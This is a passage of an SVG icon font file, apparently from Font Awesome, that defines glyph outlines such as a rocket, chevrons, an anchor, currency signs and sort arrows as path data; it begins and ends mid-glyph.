d="M434.027 421.671c7.31445 1.21875 13.9727 -4.4209 13.9727 -11.8369v-115.668c0 -7.41602 -6.6582 -13.0557 -13.9727 -11.8369l-168 28c-11.7305 1.95508 -10.0273 14.6973 -10.0273 17.6709h-40v-27.0303c41.4043 -10.6582 72 -48.2383 72 -92.9697v-248
c0 -13.2549 -10.7451 -24 -24 -24h-144c-13.2549 0 -24 10.7451 -24 24v246.795c0 44.8945 30.457 83.2666 72 94.1289v27.0762c-61.0361 0 -92.9424 7.00977 -121.711 -64.9141c-4.91699 -12.2949 -18.8789 -18.2959 -31.1963 -13.3701
c-12.3066 4.92285 -18.293 18.8906 -13.3701 31.1973c14.668 36.6709 38.0107 77.833 90.0498 90.8838c-14.1406 36.5273 12.793 76.2031 52.2275 76.2031c37.4463 0 64.3525 -36.1084 53.668 -72h58.332c0 4.2002 -1.30664 15.7822 10.0273 17.6709zM144 376
c8.82227 0 16 7.17773 16 16s-7.17773 16 -16 16s-16 -7.17773 -16 -16s7.17773 -16 16 -16z" />
    <glyph glyph-name="rocket" unicode="&#xf135;" horiz-adv-x="511" 
d="M505.05 428.9c6.9502 -32.2002 6.9502 -57.4004 6.85059 -82.6006c0 -102.689 -55.4102 -164.79 -128 -211.09v-104.41v-0.0400391c0 -16.3516 -11.8721 -35.5527 -26.5 -42.8594l-98.7002 -49.3906c-2.79004 -1.38965 -7.58398 -2.5166 -10.7002 -2.5166
c-13.248 0 -24 10.752 -24 24v0.00683594v103.84l-22.4697 -22.4697c-5.17383 -5.1748 -15.3125 -9.375 -22.6299 -9.375c-7.31836 0 -17.4561 4.2002 -22.6309 9.375l-50.8994 50.9102c-5.17285 5.17285 -9.37012 15.3096 -9.37012 22.625s4.19727 17.4512 9.37012 22.625
l22.4697 22.4697h-103.77h-0.0126953c-13.248 0 -24 10.752 -24 24c0 3.12012 1.12988 7.91797 2.52246 10.71l49.4199 98.7998c7.32324 14.6094 26.5283 26.4766 42.8701 26.4902h104.2c46.1895 72.7998 108.09 128 211.29 128c25.0996 0 50.29 0 82.4893 -6.90039
c5.54395 -1.19043 11.0098 -6.65527 12.2002 -12.1992zM384 280c22.0801 0 40 17.9199 40 40s-17.9199 40 -40 40s-40 -17.9199 -40 -40s17.9199 -40 40 -40z" />
    <glyph glyph-name="chevron-circle-left" unicode="&#xf137;" 
d="M256 -56c-137 0 -248 111 -248 248s111 248 248 248s248 -111 248 -248s-111 -248 -248 -248zM142.1 175l135.5 -135.5c9.40039 -9.40039 24.6006 -9.40039 33.9004 0l17 17c9.40039 9.40039 9.40039 24.5996 0 33.9004l-101.6 101.6l101.6 101.6
c9.40039 9.40039 9.40039 24.6006 0 33.9004l-17 17c-9.40039 9.40039 -24.5996 9.40039 -33.9004 0l-135.5 -135.5c-9.39941 -9.40039 -9.39941 -24.5996 0 -34z" />
    <glyph glyph-name="chevron-circle-right" unicode="&#xf138;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM369.9 209l-135.5 135.5c-9.40039 9.40039 -24.6006 9.40039 -33.9004 0l-17 -17c-9.40039 -9.40039 -9.40039 -24.5996 0 -33.9004l101.6 -101.6l-101.6 -101.6
c-9.40039 -9.40039 -9.40039 -24.6006 0 -33.9004l17 -17c9.40039 -9.40039 24.5996 -9.40039 33.9004 0l135.5 135.5c9.39941 9.40039 9.39941 24.5996 0 34z" />
    <glyph glyph-name="chevron-circle-up" unicode="&#xf139;" 
d="M8 192c0 137 111 248 248 248s248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248zM239 305.9l-135.5 -135.5c-9.40039 -9.40039 -9.40039 -24.6006 0 -33.9004l17 -17c9.40039 -9.40039 24.5996 -9.40039 33.9004 0l101.6 101.6l101.6 -101.6
c9.40039 -9.40039 24.6006 -9.40039 33.9004 0l17 17c9.40039 9.40039 9.40039 24.5996 0 33.9004l-135.5 135.5c-9.40039 9.39941 -24.5996 9.39941 -34 0z" />
    <glyph glyph-name="chevron-circle-down" unicode="&#xf13a;" 
d="M504 192c0 -137 -111 -248 -248 -248s-248 111 -248 248s111 248 248 248s248 -111 248 -248zM273 78.0996l135.5 135.5c9.40039 9.40039 9.40039 24.6006 0 33.9004l-17 17c-9.40039 9.40039 -24.5996 9.40039 -33.9004 0l-101.6 -101.6l-101.6 101.6
c-9.40039 9.40039 -24.6006 9.40039 -33.9004 0l-17 -17c-9.40039 -9.40039 -9.40039 -24.5996 0 -33.9004l135.5 -135.5c9.40039 -9.39941 24.5996 -9.39941 34 0z" />
    <glyph glyph-name="anchor" unicode="&#xf13d;" horiz-adv-x="575" 
d="M12.9707 96c-10.6904 0 -16.0449 12.9258 -8.48535 20.4854l67.0283 67.0283c4.6875 4.68652 12.2852 4.68652 16.9717 0l67.0283 -67.0283c7.56055 -7.55957 2.20605 -20.4854 -8.48438 -20.4854h-35.1465c20.2969 -54.3359 85.1816 -86.6162 144.117 -94.0146v190.015
h-52c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h52v5.46973c-37.2842 13.1807 -64 48.7324 -64 90.5303c0 53.4746 43.7227 96.7393 97.3701 95.9902c52.2354 -0.728516 94.6348 -43.7627 94.6289 -96.002
c-0.00488281 -41.793 -26.7188 -77.3398 -64 -90.5186v-5.46973h52c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-52v-190.015c59.1543 7.42676 123.827 39.6973 144.117 94.0146h-35.1465c-10.6904 0 -16.0449 12.9248 -8.48438 20.4854
l67.0283 67.0283c4.6875 4.68652 12.2852 4.68652 16.9717 0l67.0283 -67.0283c7.56055 -7.55957 2.20605 -20.4854 -8.48438 -20.4854h-32.3945c-21.7822 -102.62 -136.406 -160 -242.635 -160c-106.056 0 -220.828 57.2646 -242.635 160h-32.3945zM288 384
c-17.6445 0 -32 -14.3555 -32 -32s14.3555 -32 32 -32s32 14.3555 32 32s-14.3555 32 -32 32z" />
    <glyph glyph-name="unlock-alt" unicode="&#xf13e;" horiz-adv-x="448" 
d="M400 192c26.5 0 48 -21.5 48 -48v-160c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v160c0 26.5 21.5 48 48 48h24v102.5c0 84 67.5 153.2 151.5 153.5s152.5 -68 152.5 -152v-16c0 -13.2998 -10.7002 -24 -24 -24h-32c-13.2998 0 -24 10.7002 -24 24v16
c0 39.9004 -32.7002 72.4004 -72.7002 72c-39.5996 -0.400391 -71.2998 -33.2998 -71.2998 -72.9004v-103.1h248zM264 40v48c0 22.0996 -17.9004 40 -40 40s-40 -17.9004 -40 -40v-48c0 -22.0996 17.9004 -40 40 -40s40 17.9004 40 40z" />
    <glyph glyph-name="bullseye" unicode="&#xf140;" horiz-adv-x="496" 
d="M248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248zM248 8c101.71 0 184 82.3096 184 184c0 101.71 -82.3096 184 -184 184c-101.71 0 -184 -82.3096 -184 -184c0 -101.71 82.3096 -184 184 -184zM248 320
c70.6904 0 128 -57.3096 128 -128s-57.3096 -128 -128 -128s-128 57.3096 -128 128s57.3096 128 128 128zM248 128c35.29 0 64 28.71 64 64s-28.71 64 -64 64s-64 -28.71 -64 -64s28.71 -64 64 -64z" />
    <glyph glyph-name="ellipsis-h" unicode="&#xf141;" 
d="M328 192c0 -39.7998 -32.2002 -72 -72 -72s-72 32.2002 -72 72s32.2002 72 72 72s72 -32.2002 72 -72zM432 264c39.7998 0 72 -32.2002 72 -72s-32.2002 -72 -72 -72s-72 32.2002 -72 72s32.2002 72 72 72zM80 264c39.7998 0 72 -32.2002 72 -72s-32.2002 -72 -72 -72
s-72 32.2002 -72 72s32.2002 72 72 72z" />
    <glyph glyph-name="ellipsis-v" unicode="&#xf142;" horiz-adv-x="192" 
d="M96 264c39.7998 0 72 -32.2002 72 -72s-32.2002 -72 -72 -72s-72 32.2002 -72 72s32.2002 72 72 72zM24 368c0 39.7998 32.2002 72 72 72s72 -32.2002 72 -72s-32.2002 -72 -72 -72s-72 32.2002 -72 72zM24 16c0 39.7998 32.2002 72 72 72s72 -32.2002 72 -72
s-32.2002 -72 -72 -72s-72 32.2002 -72 72z" />
    <glyph glyph-name="rss-square" unicode="&#xf143;" horiz-adv-x="448" 
d="M400 416c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352zM112 32c26.5098 0 48 21.4902 48 48s-21.4902 48 -48 48s-48 -21.4902 -48 -48s21.4902 -48 48 -48zM269.533 32
c6.53516 0 11.7764 5.46777 11.4248 11.9941c-5.9668 110.428 -94.418 198.99 -204.964 204.964c-6.52637 0.351562 -11.9941 -4.88965 -11.9941 -11.4248v-34.335c0 -6.00977 4.63574 -11.0508 10.6328 -11.4414c79.8799 -5.20312 143.909 -69.0732 149.123 -149.123
c0.391602 -5.99805 5.43066 -10.6338 11.4424 -10.6338h34.335zM372.56 32c6.4541 0 11.6641 5.33789 11.4326 11.7871c-5.99512 167.014 -140.375 302.18 -308.205 308.205c-6.44922 0.231445 -11.7871 -4.97852 -11.7871 -11.4326v-34.334
c0 -6.16016 4.88184 -11.1748 11.0391 -11.4277c136.556 -5.59863 246.162 -115.225 251.76 -251.76c0.251953 -6.15625 5.2666 -11.0381 11.4268 -11.0381h34.334z" />
    <glyph glyph-name="play-circle" unicode="&#xf144;" 
d="M256 440c137 0 248 -111 248 -248s-111 -248 -248 -248s-248 111 -248 248s111 248 248 248zM371.7 168c16.3994 9.09961 16.3994 32.7998 0 42l-176 107c-15.9004 8.7998 -35.7002 -2.59961 -35.7002 -21v-208c0 -18.5 19.9004 -29.7998 35.7002 -21z" />
    <glyph glyph-name="minus-square" unicode="&#xf146;" horiz-adv-x="448" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM92 152h264c6.59961 0 12 5.40039 12 12v56c0 6.59961 -5.40039 12 -12 12h-264c-6.59961 0 -12 -5.40039 -12 -12v-56
c0 -6.59961 5.40039 -12 12 -12z" />
    <glyph glyph-name="check-square" unicode="&#xf14a;" horiz-adv-x="448" 
d="M400 -32h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48zM195.314 66.0586l184 184c6.24707 6.24805 6.24707 16.3799 0 22.627l-22.6279 22.6279
c-6.24707 6.24707 -16.3789 6.24805 -22.6279 0l-150.059 -150.059l-70.0586 70.0596c-6.24805 6.24707 -16.3799 6.24707 -22.6279 0l-22.6279 -22.6279c-6.24707 -6.24707 -6.24707 -16.3789 0 -22.627l104 -104c6.24902 -6.25 16.3799 -6.25 22.6289 -0.000976562z" />
    <glyph glyph-name="pen-square" unicode="&#xf14b;" horiz-adv-x="448" 
d="M400 -32h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48zM238.1 270.1l-135.699 -135.699l-6.30078 -57.1006c-0.799805 -7.59961 5.60059 -14.0996 13.3008 -13.2998l57.0996 6.2998l135.7 135.7
c2.2998 2.2998 2.2998 6.09961 0 8.5l-55.5 55.5c-2.5 2.40039 -6.2998 2.40039 -8.60059 0.0996094zM345 282.9l-30.0996 30.0996c-9.40039 9.40039 -24.6006 9.40039 -33.9004 0l-23.0996 -23.0996c-2.30078 -2.30078 -2.30078 -6.10059 0 -8.5l55.5 -55.5
c2.2998 -2.30078 6.09961 -2.30078 8.5 0l23.0996 23.0996c9.2998 9.2998 9.2998 24.5 0 33.9004z" />
    <glyph glyph-name="share-square" unicode="&#xf14d;" horiz-adv-x="576" 
d="M568.482 270.552l-144.004 -135.984c-15.1787 -14.335 -40.4785 -3.70703 -40.4785 17.4473v71.9629c-144.575 -0.969727 -205.566 -35.1123 -164.775 -171.353c4.4834 -14.9727 -12.8457 -26.5674 -25.0059 -17.3301
c-38.9668 29.5996 -74.2188 86.2168 -74.2188 143.366c0 143.937 117.599 172.5 264 173.312v72.0156c0 21.1738 25.3174 31.7676 40.4785 17.4473l144.004 -135.987c10.0195 -9.46289 10.0273 -25.4248 0 -34.8965zM384 68.8721c0 7.34473 6.53027 12.9053 13.7998 11.8594
c2.81152 -0.405273 7.39844 -0.734375 10.2393 -0.734375c6.80469 0 17.5342 1.8418 23.9502 4.11133c7.81348 2.76367 16.0107 -3.01465 16.0107 -11.3027v-88.8057c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48
h121.033c12.5508 0 16.6748 -16.8301 5.54492 -22.6309c-18.7773 -9.78613 -36.0615 -22.1084 -51.0137 -37.6758c-1.95312 -2.03711 -5.82715 -3.69141 -8.64844 -3.69336h-50.916v-320h320v68.8721z" />
    <glyph glyph-name="compass" unicode="&#xf14e;" horiz-adv-x="496" 
d="M225.38 214.63c12.4902 12.4902 32.75 12.4902 45.25 0s12.5 -32.75 0 -45.25c-12.4902 -12.5 -32.7598 -12.5 -45.25 0c-12.5 12.4902 -12.5 32.75 0 45.25zM248 440c136.97 0 248 -111.03 248 -248s-111.03 -248 -248 -248s-248 111.03 -248 248s111.03 248 248 248z
M374.14 291.95c7.61035 16.6494 -9.54004 33.7998 -26.1895 26.2002l-144.34 -65.9707c-5.97461 -2.73047 -13.04 -9.7959 -15.7705 -15.7695l-65.9795 -144.351c-7.61035 -16.6494 9.5498 -33.8096 26.1992 -26.1992l144.341 65.9697
c5.97363 2.73047 13.0391 9.7959 15.7695 15.7695z" />
    <glyph glyph-name="caret-square-down" unicode="&#xf150;" horiz-adv-x="448" 
d="M448 368v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48zM92.5 227.5l123 -123c4.7002 -4.7002 12.2998 -4.7002 17 0l123 123c7.59961 7.59961 2.2002 20.5 -8.5 20.5h-246
c-10.7002 0 -16.0996 -12.9004 -8.5 -20.5z" />
    <glyph glyph-name="caret-square-up" unicode="&#xf151;" horiz-adv-x="448" 
d="M0 16v352c0 26.5098 21.4902 48 48 48h352c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48zM355.515 156.485l-123.029 123.029c-4.68652 4.68652 -12.2842 4.68652 -16.9717 0l-123.028 -123.029
c-7.56055 -7.56055 -2.20605 -20.4854 8.48438 -20.4854h246.06c10.6904 0 16.0449 12.9258 8.48535 20.4854z" />
    <glyph glyph-name="caret-square-right" unicode="&#xf152;" horiz-adv-x="448" 
d="M48 416h352c26.5098 0 48 -21.4902 48 -48v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48zM188.485 60.4854l123.028 123.028c4.68652 4.68652 4.68652 12.2842 0 16.9717l-123.028 123.029
c-7.56055 7.56055 -20.4854 2.20605 -20.4854 -8.48438v-246.06c0 -10.6904 12.9258 -16.0449 20.4854 -8.48535z" />
    <glyph glyph-name="euro-sign" unicode="&#xf153;" horiz-adv-x="319" 
d="M310.706 34.2354l8.81836 -44.4902c1.23828 -6.24902 -2.62109 -12.3623 -8.78809 -13.957c-12.5391 -3.24414 -34.8008 -7.78809 -61.1016 -7.78809c-104.371 0 -182.496 65.3076 -207.521 155.64h-30.1143c-6.62695 0 -12 5.37305 -12 12v28.3604
c0 6.62695 5.37305 12 12 12h21.3877c-1 12.958 -0.828125 28.6377 0.181641 42.2451h-21.5693c-6.62695 0 -12 5.37305 -12 12v29.7549c0 6.62695 5.37305 12 12 12h33.0752c28.9551 83.748 107.376 144 204.56 144c21.0752 0 40.582 -2.91211 52.6865 -5.20703
c6.86035 -1.30078 11.1475 -8.17578 9.32617 -14.917l-11.9912 -44.3682c-1.65527 -6.125 -7.78613 -9.89062 -14.002 -8.62305c-9.28711 1.89551 -23.3652 4.14551 -37.8516 4.14551c-54.9287 0 -96.9854 -30.0391 -117.619 -75.0303h138.278
c7.66211 0 13.3613 -7.08203 11.7227 -14.5664l-6.51172 -29.7549c-1.13965 -5.20703 -6.3916 -9.43359 -11.7227 -9.43359v0h-146.593c-1.55176 -13.958 -1.34766 -27.917 -0.137695 -42.2451h134.237c7.68945 0 13.3936 -7.12891 11.708 -14.6309l-6.37305 -28.3604
c-1.16211 -5.17188 -6.40723 -9.36914 -11.708 -9.36914h-113.689c19.5322 -50.6582 64.6982 -85.4482 121.462 -85.4482c18.0039 0 34.7334 2.97363 45.4258 5.41211c6.58887 1.50391 13.1094 -2.73828 14.4238 -9.36816z" />
    <glyph glyph-name="pound-sign" unicode="&#xf154;" horiz-adv-x="320" 
d="M308 96c6.62695 0 12 -5.37305 12 -12v-104c0 -6.62695 -5.37305 -12 -12 -12h-296c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h36v128h-28c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h28v66.0391
c0 73.2188 58.0264 125.961 139.931 125.961c48.6455 0 85.1934 -22.5596 101.575 -34.9277c5.39844 -4.07617 6.35254 -11.8057 2.11914 -17.0811l-28.4932 -35.5137c-3.7998 -4.73535 -10.5371 -5.89746 -15.6875 -2.68457
c-11.7744 7.34375 -33.9941 18.8486 -57.6523 18.8486c-37.2305 0 -61.792 -24.8193 -61.792 -57.0859v-63.5557h84c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-84v-126.848h122.505v50.8477c0 6.62695 5.37305 12 12 12h45.4951z" />
    <glyph glyph-name="dollar-sign" unicode="&#xf155;" horiz-adv-x="288" 
d="M209.2 214.6c57.8994 -16.8994 94 -80.0996 72.5 -141.699c-15.4004 -44.1006 -59.1006 -71.8008 -105.7 -72.7002v-48.2002c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v48c-31.4004 0.0996094 -62 10.7998 -86.5 30
c-7.90039 6.09961 -8.90039 17.5996 -1.7998 24.5l34.7998 34c5.2002 5.09961 13.4004 6.09961 19.5 2c10 -6.7998 22 -10.5 34.2002 -10.5h66.2998c16.2998 0 29.5 13.2002 29.5 29.5c0 13 -8.7002 24.5996 -21.2002 28.2998l-102.5 30
c-44.3994 13 -79.5996 50.5 -83.7998 96.6006c-5.90039 64.8994 45.2998 119.6 109 119.6h2.5v48c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-48c31.4004 -0.0996094 62 -10.7998 86.5 -30c7.90039 -6.09961 8.90039 -17.5996 1.7998 -24.5l-34.7998 -34
c-5.2002 -5.09961 -13.4004 -6.09961 -19.5 -2c-10 6.7998 -22 10.5 -34.2002 10.5h-66.2998c-16.2998 0 -29.5 -13.2002 -29.5 -29.5c0 -13 8.7002 -24.7002 21.2002 -28.2998z" />
    <glyph glyph-name="rupee-sign" unicode="&#xf156;" horiz-adv-x="320" 
d="M308 352h-72.9424c5.97266 -9.75391 10.7666 -20.459 14.252 -32h58.6904c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-52.8105c-7.1748 -74.5107 -61.8193 -125.566 -138.318 -127.906l150.882 -139.275
c8.02734 -7.41016 2.78516 -20.8184 -8.13867 -20.8184h-82.5625c-2.58984 0 -6.23535 1.42578 -8.13867 3.18164l-165.052 152.356c-2.46094 2.27148 -3.86133 5.46875 -3.86133 8.81836v53.0117c0 6.62695 5.37305 12 12 12h84c41.7959 0 68.54 22.5459 74.7568 58.6318
h-158.757c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h146.25c-12.709 17.2939 -33.6621 27.252 -60.9697 27.252h-85.2803c-6.62695 0 -12 5.37305 -12 12v44.748c0 6.62695 5.37305 12 12 12h296c6.62695 0 12 -5.37305 12 -12v-40
c0 -6.62695 -5.37305 -12 -12 -12z" />
    <glyph glyph-name="yen-sign" unicode="&#xf157;" horiz-adv-x="384" 
d="M351.2 416c9.09961 0 14.8994 -9.7002 10.5996 -17.5996l-80.0996 -150.4h58.2998c6.59961 0 12 -5.40039 12 -12v-32c0 -6.59961 -5.40039 -12 -12 -12h-88.2002l-19.7998 -37.2002v-26.7998h108c6.59961 0 12 -5.40039 12 -12v-32c0 -6.59961 -5.40039 -12 -12 -12
h-108v-92c0 -6.59961 -5.40039 -12 -12 -12h-56c-6.59961 0 -12 5.40039 -12 12v92h-108c-6.59961 0 -12 5.40039 -12 12v32c0 6.59961 5.40039 12 12 12h108v26.7998l-19.7998 37.2002h-88.2002c-6.59961 0 -12 5.40039 -12 12v32c0 6.59961 5.40039 12 12 12h58.2998
l-80.0996 150.4c-4.2002 7.89941 1.5 17.5996 10.5996 17.5996h65.2002c4.59961 0 8.7998 -2.59961 10.7998 -6.7002l55.4004 -113.2c14.5 -34.6992 27.0996 -71.8994 27.0996 -71.8994h1.2998s12.6006 37.2002 27.1006 71.8994l55.3994 113.2
c2 4.10059 6.2002 6.7002 10.8008 6.7002h65.2998z" />
    <glyph glyph-name="ruble-sign" unicode="&#xf158;" horiz-adv-x="384" 
d="M239.36 128h-92.8008v-32h161.44c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-161.44v-52c0 -6.62695 -5.37305 -12 -12 -12h-58.5596c-6.62695 0 -12 5.37305 -12 12v52h-52c-6.62695 0 -12 5.37305 -12 12v40c0 6.62695 5.37305 12 12 12h52
v32h-52c-6.62695 0 -12 5.37305 -12 12v45.3682c0 6.62695 5.37305 12 12 12h52v206.632c0 6.62695 5.37305 12 12 12h163.36c85.1201 0 144.64 -57.5996 144.64 -143.071c0 -85.4707 -59.5195 -144.929 -144.64 -144.929zM146.56 347.252v-149.884h77.4404
c48 0 76.1602 29.7285 76.1602 75.5605c0 45.2129 -28.1602 74.3232 -74.8799 74.3232h-78.7207z" />
    <glyph glyph-name="won-sign" unicode="&#xf159;" horiz-adv-x="576" 
d="M564 256h-62.7002l-7.39941 -32h70.0996c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12h-84.9004l-42.0996 -182.7c-1.2998 -5.39941 -6.09961 -9.2998 -11.7002 -9.2998h-56.7998c-5.59961 0 -10.4004 3.90039 -11.7002 9.2998l-42.3994 182.7
h-55.1006l-42.2998 -182.7c-1.2998 -5.39941 -6.09961 -9.2998 -11.7002 -9.2998h-56.7998c-5.59961 0 -10.5 3.90039 -11.7002 9.40039l-40.8994 182.6h-83.9004c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h69.5l-7.2002 32h-62.2998
c-6.59961 0 -12 5.40039 -12 12v40c0 6.59961 5.40039 12 12 12h48l-18.0996 80.7002c-1.7002 7.5 4 14.5996 11.6992 14.5996h42.1006c5.7002 0 10.7002 -4 11.7998 -9.59961l17.5 -85.7002h108.7l20 86c1.2998 5.5 6.09961 9.2998 11.7002 9.2998h44
c5.59961 0 10.3994 -3.7998 11.6992 -9.2998l19.7002 -86h109.9l14.3994 85.7998c1.10059 5.5 6 9.5 11.7002 9.5h46.1006c7.69922 0 13.3994 -7.2002 11.6992 -14.7002l-18.5996 -80.5996h48c6.59961 0 12 -5.40039 12 -12v-40c0 -6.59961 -5.40039 -12 -12 -12zM183.8 106
l12.6006 54h-38.8008l11 -54c5.10059 -25.2002 6.80078 -47.2002 6.80078 -47.2002h1.09961c0.5 0 1.09961 21.4004 7.2998 47.2002zM211.3 224l7.5 32h-80.7998l6.5 -32h66.7998zM274.2 224h25.3994l-2 8.59961c-1.89941 8 -3.5 16 -4.7998 23.4004h-11.7998
c-1.2998 -7.40039 -2.90039 -15.4004 -4.7998 -23.4004zM405.1 106l11.5 54h-39.0996l12.4004 -54c6.19922 -25.7998 6.69922 -47.2002 7.2998 -47.2002h1.09961s1.7002 22 6.7998 47.2002zM430.3 224l6.90039 32h-81.6006l7.30078 -32h67.3994z" />
    <glyph glyph-name="file" unicode="&#xf15b;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM384 326.1v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7l97.9004 -98
c4.5 -4.5 7 -10.5996 7 -16.9004z" />
    <glyph glyph-name="file-alt" unicode="&#xf15c;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM288 76v8c0 6.59961 -5.40039 12 -12 12h-168c-6.59961 0 -12 -5.40039 -12 -12v-8
c0 -6.59961 5.40039 -12 12 -12h168c6.59961 0 12 5.40039 12 12zM288 140v8c0 6.59961 -5.40039 12 -12 12h-168c-6.59961 0 -12 -5.40039 -12 -12v-8c0 -6.59961 5.40039 -12 12 -12h168c6.59961 0 12 5.40039 12 12zM288 212c0 6.59961 -5.40039 12 -12 12h-168
c-6.59961 0 -12 -5.40039 -12 -12v-8c0 -6.59961 5.40039 -12 12 -12h168c6.59961 0 12 5.40039 12 12v8zM384 326.1v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7l97.9004 -98c4.5 -4.5 7 -10.5996 7 -16.9004z" />
    <glyph glyph-name="sort-alpha-down" unicode="&#xf15d;" horiz-adv-x="424" 
d="M400.7 20.9004c6.59961 0 12 -5.30078 12 -12v-28.9004c0 -6.59961 -5.40039 -12 -12 -12h-129.4c-6.59961 0 -12 5.40039 -12 12v21.9004c0 2.5 0.799805 4.89941 2.2002 6.89941l67.2002 95.2002c0.799805 1.09961 1.59961 2.09961 2.2998 3.09961h-56.5
c-6.59961 0 -12 5.40039 -12 12v28.9004c0 6.59961 5.40039 12 12 12h125.1c6.60059 0 12 -5.40039 12 -12v-21.4004c0 -2.5 -0.799805 -4.89941 -2.19922 -6.89941l-67.5 -95.7002c-0.800781 -1.09961 -1.60059 -2.09961 -2.30078 -3.09961h61.1006zM176 80
c14.2002 0 21.2998 -17.2998 11.2998 -27.2998l-80 -80c-6.2002 -6.2002 -16.3994 -6.2002 -22.5996 0l-80 80c-10.1006 10.0996 -2.90039 27.2998 11.2998 27.2998h48v320c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-320h48zM424.2 239.9
c2.7002 -7.80078 -3.10059 -15.9004 -11.5 -15.9004h-35.7002c-4.94629 0.00292969 -10.0986 3.85645 -11.5 8.59961l-8.2998 28.3008h-42.9004l-8.09961 -28.2002c-1.40039 -5.2002 -6.10059 -8.7002 -11.5 -8.7002h-35.7002c-8.2998 0 -14 8.09961 -11.4004 15.9004
l57.1006 168c1.7002 4.7998 6.2998 8.09961 11.3994 8.09961h39.6006c5.2002 0 9.7002 -3.2002 11.3994 -8.09961zM329.2 311.4h13.3994l-6.59961 22.8994z" />
    <glyph glyph-name="sort-alpha-up" unicode="&#xf15e;" horiz-adv-x="424" 
d="M107.3 411.3l80 -80c10.1006 -10.0996 2.90039 -27.2998 -11.2998 -27.2998h-48v-320c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v320h-48c-14.2002 0 -21.2998 17.2998 -11.2998 27.2998l80 80c6.2002 6.2002 16.3994 6.2002 22.5996 0z
M400.7 20.9004c6.59961 0 12 -5.30078 12 -12v-28.9004c0 -6.59961 -5.40039 -12 -12 -12h-129.4c-6.59961 0 -12 5.40039 -12 12v21.9004c0 2.5 0.799805 4.89941 2.2002 6.89941l67.2002 95.2002c0.799805 1.09961 1.59961 2.09961 2.2998 3.09961h-56.5
c-6.59961 0 -12 5.40039 -12 12v28.9004c0 6.59961 5.40039 12 12 12h125.1c6.60059 0 12 -5.40039 12 -12v-21.4004c0 -2.5 -0.799805 -4.89941 -2.19922 -6.89941l-67.5 -95.7002c-0.800781 -1.09961 -1.60059 -2.09961 -2.30078 -3.09961h61.1006zM424.2 239.9
c2.7002 -7.80078 -3.10059 -15.9004 -11.5 -15.9004h-35.7002c-4.94629 0.00292969 -10.0986 3.85645 -11.5 8.59961l-8.2998 28.3008h-42.9004l-8.09961 -28.2002c-1.40039 -5.2002 -6.10059 -8.7002 -11.5 -8.7002h-35.7002c-8.2998 0 -14 8.09961 -11.4004 15.9004
l57.1006 168c1.7002 4.7998 6.2998 8.09961 11.3994 8.09961h39.6006c5.2002 0 9.7002 -3.2002 11.3994 -8.09961zM329.2 311.4h13.3994l-6.59961 22.8994z" />
    <glyph glyph-name="sort-amount-down" unicode="&#xf160;" 
d="M187.298 52.6855l-79.9834 -80.002c-6.24805 -6.24707 -16.3838 -6.24414 -22.6279 0l-79.9814 80.002c-10.0703 10.0703 -2.89844 27.3145 11.3135 27.3145h47.9814v320c0 8.83691 7.16309 16 16 16h32c8.83691 0 16 -7.16309 16 -16v-320h47.9844
c14.2402 0 21.3623 -17.2637 11.3135 -27.3145zM240 352c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h256c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-256zM224 240v32c0 8.83691 7.16309 16 16 16h192
